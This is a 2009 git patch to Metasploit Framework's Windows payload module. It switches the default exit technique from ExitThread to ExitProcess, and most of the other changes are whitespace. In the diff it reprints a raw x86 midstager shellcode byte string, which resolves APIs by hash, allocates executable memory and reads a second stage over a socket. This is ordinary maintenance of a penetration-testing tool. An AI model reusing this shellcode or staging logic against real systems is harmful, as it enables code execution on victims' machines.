From 111d49135e31e4f469e765bd86a8f361b002fa57 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 21 Dec 2009 20:44:44 +0000 Subject: [PATCH] Fixes #609. Revert back to ExitProcess(0) as default, this resolves a number of small bugs git-svn-id: file:///home/svn/framework3/trunk@7935 4d416f70-5f16-0410-b530-b9f4589650da --- lib/msf/core/payload/windows.rb | 37 +++++++++++++++++---------------- 1 file changed, 19 insertions(+), 18 deletions(-) diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb index 0585369ae5..5610e5ffec 100644 --- a/lib/msf/core/payload/windows.rb +++ b/lib/msf/core/payload/windows.rb @@ -10,10 +10,10 @@ require 'msf/core' ### module Msf::Payload::Windows - # + # # ROR hash associations for some of the exit technique routines. # - @@exit_types = + @@exit_types = { 'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter 'thread' => 0x0A2A1DE0, # ExitThread @@ -42,14 +42,14 @@ module Msf::Payload::Windows end merge_info( info, 'SaveRegisters' => [ 'esp' ] ) end - + #if (info['Alias']) # info['Alias'] = 'windows/' + info['Alias'] #end register_options( [ - Msf::OptRaw.new('EXITFUNC', [ true, "Exit technique: #{@@exit_types.keys.join(", ")}", 'thread' ]) + Msf::OptRaw.new('EXITFUNC', [ true, "Exit technique: #{@@exit_types.keys.join(", ")}", 'process' ]) ], Msf::Payload::Windows ) ret @@ -92,19 +92,19 @@ module Msf::Payload::Windows # out of stack space or NX problems. # See the source file: /external/source/shellcode/windows/midstager.asm midstager = - "\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b\x12\x8b" + - "\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x0f\x85\xeb\xff" + - "\xff\xff\x8b\x6a\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c\x0d\x1c" + - "\x01\xe9\x8b\x71\x3c\x01\xee\x60\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b" + - "\x5b\x14\x8b\x73\x28\x6a\x18\x59\x31\xff\x31\xc0\xac\x3c\x61\x7c" + - "\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81\xff\x5b\xbc\x4a\x6a" + - "\x8b\x6b\x10\x8b\x1b\x75\xdb\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef" + - "\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0" + - "\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x81\xfa\x54" + - "\xca\xaf\x91\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f" + - "\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x08\x61\x89\xe3\x6a" + - "\x00\x6a\x04\x53\x57\xff\xd6\x8b\x1b\x6a\x40\x68\x00\x30\x00\x00" + - "\x53\x6a\x00\xff\xd5\x89\xc5\x55\x6a\x00\x53\x55\x57\xff\xd6\x01" + + "\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b\x12\x8b" + + "\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x0f\x85\xeb\xff" + + "\xff\xff\x8b\x6a\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c\x0d\x1c" + + "\x01\xe9\x8b\x71\x3c\x01\xee\x60\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b" + + "\x5b\x14\x8b\x73\x28\x6a\x18\x59\x31\xff\x31\xc0\xac\x3c\x61\x7c" + + "\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81\xff\x5b\xbc\x4a\x6a" + + "\x8b\x6b\x10\x8b\x1b\x75\xdb\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef" + + "\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0" + + "\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x81\xfa\x54" + + "\xca\xaf\x91\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f" + + "\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x08\x61\x89\xe3\x6a" + + "\x00\x6a\x04\x53\x57\xff\xd6\x8b\x1b\x6a\x40\x68\x00\x30\x00\x00" + + "\x53\x6a\x00\xff\xd5\x89\xc5\x55\x6a\x00\x53\x55\x57\xff\xd6\x01" + "\xc5\x29\xc3\x85\xdb\x75\xf1\xc3" # Prepend the stage prefix as necessary, such as a tag that is needed to @@ -120,7 +120,7 @@ module Msf::Payload::Windows # midstage so that we don't accidentally read in part of the second # stage. Rex::ThreadSafe.sleep(1.5) - + # The mid-stage requires that we transmit a four byte length field that # it will use as the length of the subsequent stage. conn.put([ payload.length ].pack('V')) @@ -129,3 +129,4 @@ module Msf::Payload::Windows end end +